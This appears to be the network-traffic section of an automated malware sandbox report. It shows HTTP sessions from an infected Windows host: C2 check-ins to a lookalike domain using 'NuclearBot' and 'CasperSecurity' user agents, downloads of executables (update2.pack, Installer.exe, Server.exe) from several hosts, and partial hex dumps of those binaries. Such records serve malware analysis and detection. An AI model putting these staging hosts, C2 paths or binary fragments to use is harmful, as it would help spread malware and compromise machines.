                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304919958 CEST1236INData Raw: 00 48 03 47 10 48 3b c3 76 04 b0 01 eb 02 32 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 83 ec 28 48 83 79 18 10 72 0b 48 8b 09 e8 39 8a 00 00 48 8b c8 48 8b c1 48 83 c4 28 c3 cc cc 48 89 5c 24 08 48 89 6c 24 18 48 89 74 24 20 57 48 83 ec 20
                                                                                                                                                                                                                                Data Ascii: HGH;v2H\$0H _H(HyrH9HHH(H\$Hl$Ht$ WH IHtEHyr>H)MtHLHHH_HT$8HLCHHHHHGH\$0Hl$@Ht$HH _RH(HH(Hq$
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304936886 CEST776INData Raw: ff 48 8b c3 48 83 c4 20 5b c3 40 53 48 83 ec 20 48 8b da 41 83 f8 01 75 11 48 8d 15 06 cf 02 00 48 8b cb e8 4e ea ff ff eb 05 e8 ab ff ff ff 48 8b c3 48 83 c4 20 5b c3 cc cc 40 53 48 83 ec 20 41 8b c8 48 8b da e8 97 8c 01 00 48 8d 15 7c ce 02 00
                                                                                                                                                                                                                                Data Ascii: HH [@SH HAuHHNHH [@SH AHH|HHHEHH [H(MtHHH(H9HHHa@SH <HHt3HDBHH [H\$WH HHHH[
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304954052 CEST1236INData Raw: c6 03 00 48 8d 05 ec cd 02 00 48 89 05 c5 c6 03 00 48 8d 05 f6 cd 02 00 48 89 05 a7 c6 03 00 48 8d 05 00 ce 02 00 48 89 05 b1 c6 03 00 48 8d 05 02 ce 02 00 48 89 05 ab c6 03 00 48 8d 05 04 ce 02 00 48 89 05 a5 c6 03 00 48 8d 05 12 ce 02 00 48 89
                                                                                                                                                                                                                                Data Ascii: HHHHHHHHHHHHHHHHHHH6HH8HHBHHLHHVHHPHyHRHsHTHmH
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304970026 CEST1236INData Raw: 8d 05 34 cf 02 00 48 89 05 5d c4 03 00 48 8d 05 36 cf 02 00 48 89 05 57 c4 03 00 48 8d 05 38 cf 02 00 48 89 05 51 c4 03 00 48 8d 05 3a cf 02 00 48 89 05 4b c4 03 00 48 8d 05 3c cf 02 00 48 89 05 45 c4 03 00 48 8d 05 3e cf 02 00 48 89 05 3f c4 03
                                                                                                                                                                                                                                Data Ascii: 4H]H6HWH8HQH:HKH<HEH>H?HHH9HJH3HLH-HNH'HXH!HZHHdHHnHHxHHHHHH
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304987907 CEST1236INData Raw: 02 00 48 89 05 2d c3 03 00 48 8d 05 76 d0 02 00 48 89 05 2f c3 03 00 48 8d 05 70 d0 02 00 48 89 05 29 c3 03 00 48 8d 05 8a d0 02 00 48 89 05 33 c3 03 00 48 8d 05 8c d0 02 00 48 89 05 2d c3 03 00 48 8d 05 8e d0 02 00 48 89 05 37 c3 03 00 48 8d 05
                                                                                                                                                                                                                                Data Ascii: H-HvH/HpH)HH3HH-HH7HH1HHCH$HIHHL=HHLHHzHH|HH~HHHHH
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.309663057 CEST1236INData Raw: 00 00 48 89 05 69 af 03 00 ff 15 13 af 03 00 48 8b 15 f4 b8 03 00 48 8b 8c 24 80 00 00 00 48 89 05 55 af 03 00 ff 15 f7 ae 03 00 48 8b 15 e0 b8 03 00 48 8b cb 48 89 05 46 af 03 00 ff 15 e0 ae 03 00 48 8b 15 d1 b8 03 00 49 8b cd 48 89 05 37 af 03
                                                                                                                                                                                                                                Data Ascii: HiHH$HUHHHFHIH7HIH(H$HHHHHH|HHHeHvHHNHoIH7H`I
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.169167995 CEST115OUTGET /api/update2.pack HTTP/1.1
                                                                                                                                                                                                                                User-Agent: NuclearBot
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Jul 6, 2024 13:27:09.361864090 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:09 GMT
                                                                                                                                                                                                                                Content-Length: 88576
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Last-Modified: Thu, 06 Jun 2024 17:04:07 GMT
                                                                                                                                                                                                                                ETag: "15a00-61a3babc14dc4"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eqzmg44SpIW4n2Y4rdSXtOtIu7qV30K6WeUhteYKbZdvBLqQaBgpylrUWF24tIb%2BiSpcgqa54ZM82p29ABOe63BOsAntSee5ifySzbUpP0GPHwjLKVRWWndqqsH7q87Pm2EiGJiL3Wj6q%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3e72a9148c1d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 46 0f 2c 83 02 6e 42 d0 02 6e 42 d0 02 6e 42 d0 02 6e 43 d0 96 6e 42 d0 fe 19 fb d0 11 6e 42 d0 fe 19 fe d0 03 6e 42 d0 c6 ab 8d d0 26 6e 42 d0 c6 ab 8c d0 54 6e 42 d0 c6 ab 8f d0 0b 6e 42 d0 25 a8 91 d0 05 6e 42 d0 25 a8 88 d0 03 6e 42 d0 25 a8 8e d0 03 6e 42 d0 52 69 63 68 02 6e 42 d0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 07 ec 61 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 be 00 00 00 bc 00 00 00 00 00 00 b0 34 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$F,nBnBnBnCnBnBnB&nBTnBnB%nB%nB%nBRichnBPEdaf" 4` 2W&xL`pH.texto `.rdatawbd@@.datap<@


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.449734188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:12.583743095 CEST173OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.234579086 CEST657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:13 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyF4Zymma83Qk7bWbvIFMLtPsBuVAkg6Zt61Fn4WMGPijgMm9xF5f4hWTklqNifWd72ZLIOBPEZeLDrTTjs3tN7lG2Vg3SKN1AaXSZLvEfLjvxlxNeuAx5o4t7K8YkO3NHt4sFIBiepkRaQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3e8a5b1e42e0-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 32 38 0d 0a 36 33 39 31 31 37 35 38 37 36 32 64 62 38 33 38 37 32 33 65 30 61 37 36 35 62 30 63 64 38 35 37 34 66 63 62 33 61 35 35 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2863911758762db838723e0a765b0cd8574fcb3a550


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.449735188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.245085001 CEST193OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 40
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.250129938 CEST40OUTData Raw: 5f 5d 5f 5e 4d 06 05 44 07 4a 02 18 52 44 79 77 79 77 60 48 60 22 4b 5c 5a 0c 55 10 18 09 49 02 07 55 52 57 04 59 0c 04
                                                                                                                                                                                                                                Data Ascii: _]_^MDJRDywyw`H`"K\ZUIURWY
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.965997934 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:13 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8RKrs1X2bjNrK%2F4ycsWWIG5QAmFoJ9ycWUAbI1eFO%2BhVu7Csa6xe21cEBvvh6g63nRxbry1Qd%2FXWYueyZ7xm%2Fim%2BvoHEcceXPws10gWm3Ux2DdbFFFuZNDK5pAgblwVIWAScEdudah3wXk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3e8e48bd0f59-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.449736188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.975198030 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:13.980520010 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.809854984 CEST1064INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:14 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwljk0OTCZryZaNolPZIXes0Ty%2Bjx3WklAtnwC13z1yOTcoCkm%2BmoLciCm0HbVf%2B21fEonGExs2EZgxVRzSI1PnGS6F4i39TjxI5sQheSocy3QUxTpft7hw7giUzIUJycCM9uVBaLOWAQSc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3e92fac041af-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 31 62 38 0d 0a 06 4f 51 45 45 47 0f 17 18 41 45 13 4c 51 54 5d 59 5b 46 16 1e 0e 45 51 1a 2b 5e 10 10 59 59 5b 51 14 4d 07 4b 04 38 3f 06 4f 51 45 45 47 0f 17 18 5e 40 00 01 16 43 53 18 61 56 17 46 04 45 18 50 1a 55 6e 6e 08 49 5f 40 12 13 11 09 4e 1a 42 41 44 17 58 56 52 5b 51 42 45 1c 0b 10 5f 1c 6b 52 40 45 00 42 4f 52 4e 50 6f 3a 53 18 50 41 43 44 5c 4c 4d 44 16 42 1b 5f 54 5c 5f 58 42 46 16 58 44 55 4b 31 5d 41 4e 52 40 1d 00 48 04 3a 3c 05 1e 58 17 10 48 0f 18 1b 11 14 15 1d 08 52 50 58 5a 4c 42 1f 58 47 5f 18 65 57 16 14 5d 41 16 52 4a 56 68 3a 51 4b 5e 41 16 40 59 4b 17 42 40 43 48 0a 05 56 0f 5c 40 45 1d 56 43 56 18 76 54 5e 53 5c 10 4c 5d 4b 5d 3a 38 03 19 58 15 43 46 0f 4d 1f 14 13 4f 1b 5e 53 03 0d 0b 46 12 1b 5a 44 54 16 44 41 53 54 4c 52 18 57 1c 07 35 39 08 4b 5a 47 11 40 5b 18 19 42 15 47 4d 0d 5f 50 59 5d 13 10 4c 5c 13 52 1a 43 43 5d 50 45 52 1b 5d 4f 53 3f 6e 52 44 5b 4c 43 42 09 4a 1f 16 40 41 1b 15 55 10 10 56 5c 5b 51 04 0a 10 57 08 5b 52 57 5d 5d 42 50 51 54 4a 5e 18 51 0b 0f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 1b8OQEEGAELQT]Y[FEQ+^YY[QMK8?OQEEG^@CSaVFEPUnnI_@NBADXVR[QBE_kR@EBORNPo:SPACD\LMDB_T\_XBFXDUK1]ANR@H:<XHRPXZLBXG_eW]ARJVh:QK^A@YKB@CHV\@EVCVvT^S\L]K]:8XCFMO^SFZDTDASTLRW59KZG@[BGM_PY]L\RCC]PER]OS?nRD[LCBJ@AUV\[QW[RW]]BPQTJ^QDHSWYUFTZEGIV[QAXSRM]:<LGHG_R^KXFLRPNV4;K]LCFKMODO[T^BEBKZ@^XMK8?0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.449739192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:14.852607965 CEST144OUTGET /Installer.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417437077 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:15 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 631296
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Tue, 02 Jul 2024 08:39:04 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b8 dd ab b3 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 98 09 00 00 08 00 00 00 00 00 00 2e b7 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 b6 09 00 57 00 00 00 00 c0 09 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0. @ @W H.text4 `.rsrc@@.reloc@BHgN(L(p*(*s z*z,{$,{$o(**.s%*.s**(*(E*Z~~(o+(@*j~'o+('(P(\*.s/*(S*(-*~rp(3rp(4*rsJ5~5oK6*b~8,~8o8*.(-***so(Ps(tk( (*~rp(Jrp(K*(+o^-(+ohK*Jo%(s*V-r [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417449951 CEST224INData Raw: 70 28 02 00 00 06 2a 02 6f d9 00 00 0a 2a 1b 30 02 00 c7 00 00 00 01 00 00 11 fe 09 00 00 28 07 00 00 0a fe 0e 00 00 7e 08 00 00 0a fe 0e 01 00 fe 0c 00 00 39 8b 00 00 00 fe 0c 00 00 8e 39 81 00 00 00 fe 0c 00 00 73 09 00 00 0a fe 0e 02 00 fe 0c
                                                                                                                                                                                                                                Data Ascii: p(*o*0(~99s sso9o9o9o&
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417468071 CEST1236INData Raw: 2a 00 01 34 00 00 02 00 55 00 12 67 00 13 00 00 00 00 02 00 48 00 37 7f 00 13 00 00 00 00 02 00 36 00 61 97 00 13 00 00 00 00 00 00 00 00 b7 b7 00 0b 01 00 00 01 1b 30 05 00 dd 01 00 00 00 00 00 00 72 01 00 00 70 28 02 00 00 06 17 8d 26 00 00 01
                                                                                                                                                                                                                                Data Ascii: *4UgH76a0rp(&%,(rp(&%,(rp(&%,(r?p(&%,(rp(&%,(rup(&%,(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417480946 CEST1236INData Raw: 00 00 c0 40 22 00 00 50 41 73 15 00 00 0a 28 16 00 00 0a 02 17 28 17 00 00 0a 02 20 7f 01 00 00 20 bf 00 00 00 73 18 00 00 0a 28 19 00 00 0a 02 72 de 0f 00 70 28 02 00 00 06 28 1a 00 00 0a 02 72 de 0f 00 70 28 02 00 00 06 6f 1b 00 00 0a 02 02 fe
                                                                                                                                                                                                                                Data Ascii: @"PAs(( s(rp((rp(os((((&*0(!(" .l(#-c~&%-&~%s$%&s%%o&%o'o(~~2_,~(G(L
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417495012 CEST1236INData Raw: 0a de 0a 09 2c 06 09 6f 0d 00 00 0a dc 73 3c 00 00 0a 25 07 6f 3d 00 00 0a 25 17 6f 3e 00 00 0a 25 16 6f 3f 00 00 0a 25 16 6f 40 00 00 0a 25 17 6f 41 00 00 0a 28 42 00 00 0a 26 16 28 0f 00 00 0a 2a 01 28 00 00 02 00 c9 00 19 e2 00 0e 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: ,os<%o=%o>%o?%o@%oA(B&(*(q0~'o+(C'~'o+(C&~'oD~(o+(,,!~(E,~(o+(F&~,i~(o+sG~)(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417506933 CEST672INData Raw: 00 00 b5 00 00 00 0e 00 00 00 00 00 00 00 02 00 00 00 ce 00 00 00 3b 00 00 00 09 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 01 00 00 4a 01 00 00 15 00 00 00 01 00 00 01 13 30 04 00 50 00 00 00 07 00 00 11 16 0a 17 0b 16 0c 2b 2e
                                                                                                                                                                                                                                Data Ascii: ;JJ0P+.onYYooonYYoo.+XXonon(p_-*0>+oooo.+XXonon(p_-*0
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417521000 CEST1236INData Raw: 25 16 1f 2c 9d 28 0e 00 00 0a 80 18 00 00 04 72 fd 61 01 70 28 02 00 00 06 17 8d 26 00 00 01 25 16 1f 2c 9d 28 0e 00 00 0a 80 19 00 00 04 72 10 67 01 70 28 02 00 00 06 17 8d 26 00 00 01 25 16 1f 2c 9d 28 0e 00 00 0a 80 1a 00 00 04 72 6d c7 01 70
                                                                                                                                                                                                                                Data Ascii: %,(rap(&%,(rgp(&%,(rmp(&%,(rp(&%,(rp(&%,(r&p(&%,(rp(&%,(rp(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417532921 CEST1236INData Raw: 28 00 00 04 6f 2b 00 00 0a a2 25 18 72 4b f8 01 70 28 02 00 00 06 a2 25 19 28 9a 00 00 0a 0b 12 01 23 00 00 00 00 00 00 14 40 28 9b 00 00 0a 0b 12 01 72 95 f8 01 70 28 02 00 00 06 28 9c 00 00 0a a2 25 1a 72 df f8 01 70 28 02 00 00 06 a2 28 7c 00
                                                                                                                                                                                                                                Data Ascii: (o+%rKp(%(#@(rp((%rp((|s<%o%oA%o>%rjp(o=%o%o@(B&&*0-rp(o`,/rp(r6p(('rp((:
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417546034 CEST448INData Raw: 70 28 02 00 00 06 a2 25 17 7e 0f 00 00 04 a2 25 18 72 d5 00 02 70 28 02 00 00 06 a2 25 19 7e 10 00 00 04 a2 25 1a 72 47 01 02 70 28 02 00 00 06 a2 25 1b 7e 15 00 00 04 a2 25 1c 02 a2 25 1d 72 91 01 02 70 28 02 00 00 06 a2 28 7c 00 00 0a 6f ae 00
                                                                                                                                                                                                                                Data Ascii: p(%~%rp(%~%rGp(%~%%rp((|o&&*mm0(Qs%orp(((r5p(((4orop(rp((4ooorT
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.417587042 CEST1236INData Raw: 09 8e 69 32 bd 07 17 58 0b 07 06 8e 69 32 9c 7e 13 00 00 04 2c 0f 7e 11 00 00 04 28 47 00 00 06 28 4c 00 00 06 2a 13 30 03 00 27 01 00 00 00 00 00 00 7e 17 00 00 04 7e 39 00 00 04 02 7b 49 00 00 04 28 57 00 00 06 7e 16 00 00 04 7e 3a 00 00 04 02
                                                                                                                                                                                                                                Data Ascii: i2Xi2~,~(G(L*0'~~9{I(W~~:{I(W~~;{I(W~~<{I(W~~={I(W~~>{I(W~~?{I(W~~@{I(W~~A{I(W~
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.422744989 CEST1236INData Raw: 28 02 00 00 06 6f d0 00 00 0a 25 2d 04 26 14 2b 22 03 28 d0 00 00 0a 25 2d 04 26 14 2b 15 03 72 40 07 02 70 28 02 00 00 06 28 34 00 00 0a 28 d0 00 00 0a 0b 07 2d 02 de 5a 07 72 82 07 02 70 28 02 00 00 06 6f d1 00 00 0a 25 2d 04 26 14 2b 05 6f 75
                                                                                                                                                                                                                                Data Ascii: (o%-&+"(%-&+r@p((4(-Zrp(o%-&+ourp((4(-$(e~PXP,o&*FP0(OsQL(OsQMs"%r&


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.44974264.31.40.18802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.324762106 CEST133OUTGET /Server.exe HTTP/1.1
                                                                                                                                                                                                                                Host: hrdc.pk
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.847731113 CEST988INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:16 GMT
                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                location: https://hrdc.pk/Server.exe
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.449745192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:16.854095936 CEST141OUTGET /Server.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.451699972 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:17 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 179200
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Tue, 02 Jul 2024 10:09:37 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
